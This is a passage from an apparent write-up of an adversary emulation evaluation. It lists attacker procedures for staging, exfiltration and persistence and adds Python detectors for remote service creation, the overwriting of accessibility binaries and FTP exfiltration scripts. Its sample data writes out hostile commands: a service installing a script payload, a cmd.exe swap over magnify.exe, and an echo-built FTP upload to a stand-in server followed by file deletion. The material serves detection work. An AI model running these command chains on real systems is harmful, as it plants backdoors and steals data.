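                 "narrator.exe", "displayswitch.exe", "atbroker.exe"}


def _tokens(cmd):
    """Split a command line, dropping a leading 'cmd.exe /c' wrapper."""
    t = cmd.split()
    if (len(t) > 2 and ntpath.basename(t[0]).lower() in ("cmd", "cmd.exe")
            and t[1].lower() == "/c"):
        t = t[2:]
    return t


def stage_sc(ev):
    # sc.exe [\\target] verb service ...  ->  (verb, (target, service)) or None
    t = _tokens(ev.command_line)
    if not t or ntpath.basename(t[0]).lower() not in ("sc", "sc.exe"):
        return None
    i, target = 1, ev.host                    # no \\target means the local host
    if i < len(t) and t[i].startswith("\\\\"):
        target, i = t[i][2:], i + 1
    if i + 1 >= len(t):
        return None                           # e.g. 'sc query' with no service operand
    verb, service = t[i].lower(), t[i + 1].lower()
    return (verb, (target.lower(), service)) if verb in ("create", "description", "start") else None


def stage_accessibility(ev):
    # takeown /f P | icacls P ... | copy SRC P  ->  (stage, basename(P)) or None
    t = _tokens(ev.command_line)
    if not t:
        return None
    exe = ntpath.basename(t[0]).lower()
    exe = exe[:-4] if exe.endswith(".exe") else exe
    low = [x.lower() for x in t]
    path = None
    if exe == "takeown" and "/f" in low and low.index("/f") + 1 < len(t):
        path = t[low.index("/f") + 1]
    elif exe == "icacls" and len(t) > 1:
        path = t[1]
    elif exe == "copy" and len(t) > 2:
        path = t[-1]                          # destination is the last operand
    if path is None:
        return None
    name = ntpath.basename(path.strip('"')).lower()
    return (exe, name) if name in ACCESSIBILITY else None


# rule -> (stage extractor, stages that must all appear; the last one closes the chain)
RULES = {
    "remote_service_chain": (stage_sc, ["create", "start"]),
    "accessibility_overwrite": (stage_accessibility, ["takeown", "icacls", "copy"]),
}


def correlate(events, window=timedelta(minutes=10)):
    """Return [(rule, host, user, key, stages_in_window)] for each completed chain.

    A chain completes when its final required stage arrives and every other
    required stage was seen for the same (host, user, key) inside `window`.
    Extra stages such as 'description' are reported too, so the masquerading
    step is visible alongside create/start.
    """
    hits, seen = [], defaultdict(list)        # (rule, host, user, key) -> [(ts, stage)]
    for ev in sorted(events, key=lambda e: e.ts):
        for rule, (extract, required) in RULES.items():
            r = extract(ev)
            if r is None:
                continue
            stage, key = r
            bucket = seen[(rule, ev.host, ev.user, key)]
            bucket.append((ev.ts, stage))
            recent = [s for ts, s in bucket if ev.ts - ts <= window]
            if stage == required[-1] and all(s in recent for s in required):
                hits.append((rule, ev.host, ev.user, key, recent))
    return hits


T0 = datetime(2019, 1, 15, 15, 0, 0)
SAMPLE = [  # constructed records
    ProcEvent(T0, "CODERED", "kmitnick", r"sc.exe \\Creeper query"),
    ProcEvent(T0 + timedelta(seconds=20), "CODERED", "kmitnick",
              r'sc.exe \\Creeper create UpdateSvc binPath= "C:\Windows\System32\wscript.exe C:\Windows\Temp\update.vbs"'),
    ProcEvent(T0 + timedelta(seconds=25), "CODERED", "kmitnick",
              r'sc.exe \\Creeper description UpdateSvc "Windows Update Helper"'),
    ProcEvent(T0 + timedelta(seconds=30), "CODERED", "kmitnick", r"sc.exe \\Creeper qc UpdateSvc"),
    ProcEvent(T0 + timedelta(seconds=40), "CODERED", "kmitnick", r"sc.exe \\Creeper start UpdateSvc"),
    ProcEvent(T0 + timedelta(minutes=5), "CREEPER", "kmitnick",
              r"takeown /f C:\Windows\System32\magnify.exe"),
    ProcEvent(T0 + timedelta(minutes=5, seconds=5), "CREEPER", "kmitnick",
              r"icacls C:\Windows\System32\magnify.exe /grant kmitnick:F"),
    ProcEvent(T0 + timedelta(minutes=5, seconds=10), "CREEPER", "kmitnick",
              r"cmd.exe /c copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\magnify.exe"),
    # Constructed benign noise: a local service query and ownership of an unrelated file.
    ProcEvent(T0 + timedelta(minutes=6), "MORRIS", "bob", r"sc.exe query wuauserv"),
    ProcEvent(T0 + timedelta(minutes=6), "MORRIS", "bob", r"takeown /f C:\Temp\report.docx"),
]
```

The sc query and sc qc steps are deliberately not required stages: they are discovery, common in administration, and would only widen the match; keying on the remote host plus service name is what separates this from a local service install. The accessibility rule keys on the destination binary's base name, so it also catches the same chain against sethc.exe or utilman.exe rather than only the magnify.exe used in this evaluation.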

Step 18: Collection

18.A.1 Discovery

File and Directory Discovery

i. Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

18.B.1 Collection

Data Staged

i. Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)

18.B.1 Collection

Data from Network Shared Drive

i. Empire: 'copy' via PowerShell collected a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 19: Exfiltration

19.A.1 Command and Control

Masquerading

i. Empire: File dropped to disk is a renamed copy of the WinRAR binary

19.A.1 Command and Control

Remote File Copy

i. Empire: Built-in upload module executed to write binary (recycler.exe) to disk on CodeRed (10.0.1.5)

19.B.1 Defense Evasion

Data Compressed

i. Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file

19.B.1 Defense Evasion

Data Encrypted

i. Empire: Executed binary (recycler.exe) created encrypted archive (old.rar) of previously collected file

19.B.1 Exfiltration

Masquerading

i. Empire: Executed binary (recycler.exe) is a renamed copy of the WinRAR binary

19.C.1 Defense Evasion

Exfiltration Over Alternative Protocol

i. Empire: Sequence of 'echo' commands via PowerShell to populate commands in a text file (ftp.txt), which is then executed by FTP to exfiltrate data over a network connection separate from the existing C2 channel
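Because the FTP script is built line by line with echo redirections and (per 19.D) the staged archive is deleted afterwards, the process command lines are often the only record of what was sent where. The following is an added example written for this page, not code from MITRE or CrowdStrike: it replays the echo redirections to rebuild ftp.txt, then decodes the script that ftp.exe was pointed at with -s: to recover the server, account and uploaded files. The command lines are constructed to match this step; the server address, account and quoting are assumptions.

```python
"""Reconstruct an ftp -s: script from echo command lines and decode it.

Added example, not code from MITRE or CrowdStrike. The command lines are
constructed to match the 19.C pattern (echo lines build ftp.txt, ftp.exe
replays it); the server address, account and quoting are assumptions.
"""
import ntpath
import re
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class FtpFinding:
    script_path: str
    server: Optional[str] = None
    user: Optional[str] = None
    uploads: List[str] = field(default_factory=list)
    commands: List[str] = field(default_factory=list)


# '[cmd.exe /c] echo <content> > or >> <file>'; group 1 = content, 2 = op, 3 = file
_REDIRECT = re.compile(
    r'^\s*(?:cmd(?:\.exe)?\s+/c\s+)?echo\s+(.*?)\s*(>>|>)\s*("?[^"\s]+"?)\s*$', re.I)
# ftp.exe reads a command script with -s:<file>
_SCRIPT_ARG = re.compile(r'(?:^|\s)-s:("?[^"\s]+"?)', re.I)


def reconstruct_scripts(cmdlines):
    """Replay echo redirections in order into {normalized path: [lines]}."""
    files = {}
    for c in cmdlines:
        m = _REDIRECT.match(c)
        if not m:
            continue
        content, op, path = m.group(1), m.group(2), ntpath.normcase(m.group(3).strip('"'))
        if op == ">":
            files[path] = []                      # '>' truncates, '>>' appends
        files.setdefault(path, []).append(content)
    return files


def decode_ftp(cmdlines):
    """Return an FtpFinding for each ftp invocation whose script was rebuilt."""
    files = reconstruct_scripts(cmdlines)
    findings = []
    for c in cmdlines:
        t = c.split()
        if not t or ntpath.basename(t[0]).lower() not in ("ftp", "ftp.exe"):
            continue
        m = _SCRIPT_ARG.search(c)
        if not m:
            continue                              # interactive ftp: no script to decode
        path = ntpath.normcase(m.group(1).strip('"'))
        f = FtpFinding(script_path=path)
        for line in files.get(path, []):
            parts = line.split()
            if not parts:
                continue
            verb = parts[0].lower()
            f.commands.append(verb)
            if verb == "open" and len(parts) > 1:
                f.server = parts[1]
            elif verb == "user" and len(parts) > 1:
                f.user = parts[1]                 # a password may follow on the same line
            elif verb in ("put", "send", "mput") and len(parts) > 1:
                f.uploads.extend(parts[1:] if verb == "mput" else [parts[1]])
        findings.append(f)
    return findings


SAMPLE = [  # constructed command lines
    r"cmd.exe /c echo open 192.0.2.10 > ftp.txt",
    r"cmd.exe /c echo user exfil p4ss >> ftp.txt",
    r"cmd.exe /c echo binary >> ftp.txt",
    r"cmd.exe /c echo put C:\$Recycle.Bin\old.rar >> ftp.txt",
    r"cmd.exe /c echo quit >> ftp.txt",
    r"ftp -s:ftp.txt",
    r"cmd.exe /c del C:\$Recycle.Bin\old.rar",
    r"cmd.exe /c del recycler.exe",
]
```

The server recovered from the open line is the value to compare against the known C2 infrastructure, since the point of this step is that the data left over a connection separate from the existing channel. The reconstruction keys on the path string as written, so a script created as .\ftp.txt but invoked as ftp.txt will not join up unless both are resolved against the process working directory, which the telemetry has to carry for that to work.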

19.D.1 Defense Evasion

File Deletion

i. Empire: 'del C:\"$"Recycle.bin\old.rar'

19.D.2 Defense Evasion

File Deletion

i. Empire: 'del recycler.exe'

Step 20: Execution of Persistence

20.A.1 Persistence

Accessibility Features

i. magnify.exe, previously overwritten by cmd.exe, launched through an RDP connection made to Creeper (10.0.0.4)

20.A.1 Persistence

Remote Desktop Protocol

i. RDP connection made to Creeper (10.0.0.4) as part of execution of persistence mechanism

20.B.1 Execution

System Owner/User Discovery

i. Executed 'whoami' via the cmd.exe persistence mechanism over the RDP connection made to Creeper (10.0.0.4)